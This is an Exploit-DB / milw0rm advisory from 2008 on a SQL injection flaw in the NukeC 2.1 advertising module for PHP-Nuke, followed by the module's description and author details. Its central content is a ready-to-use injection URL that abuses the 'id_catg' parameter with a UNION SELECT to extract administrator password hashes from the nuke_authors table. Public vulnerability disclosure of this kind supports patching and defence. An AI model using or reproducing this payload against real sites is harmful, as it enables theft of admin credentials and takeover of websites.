PHP-Nuke Module NukeC 2.1 - 'id_catg' SQL Injection

EDB-ID:

5172


Author:

DamaR

Type:

webapps


Platform:

PHP

Date:

2008-02-21


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

=-==-==-==-==-==-==-==D==A==M==A==R==-==-==-==-==-==-==-==-==-==-==-=

PHP-NUKE Modules NukeC Module's Version: 2.1 Remote SQL Injection

###################################################################################

 

Found: DamaR
contact: By.DamaR@Hotmail.Com

Hack Bitti ama Dönmek Yakın  Since 2000

için yaklaşık 9.080 sonuçtan 1 - 10 arası sonuçlar (0,17 saniye)


###################################################################################

Exploit:

/modules.php?name=NukeC&op=ViewCatg&id_catg=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2

###################################################################################


Module Copyright © Information
NukeC module for PHP-Nuke


 Module's Name: NukeC
 Module's Version: 2.1
 Module's Description: NukeC - The Advanced Advertising System for PHP-Nuke.
NukeC Addon Module is addon module built for work on PHP-Nuke, the great web portal system.
NukeC is an advertising system that allows website visitors or members to sell something by posting the information about the item that they want to sell. With the admin sections, you could easily manage all of contents and preferences in NukeC Modules eventhough you are not a PHP programmer.
NukeC 2.1 is only work on PHP-Nuke 6.5. Please Download 2.0 or earlier for PHP-Nuke 6.0 or earlier nuke version
 License: GNU/GPL
 Author's Name: Sudirman Angriawan
 Author's Email: nukecpower@yahoo.com


###################################################################################

# milw0rm.com [2008-02-21]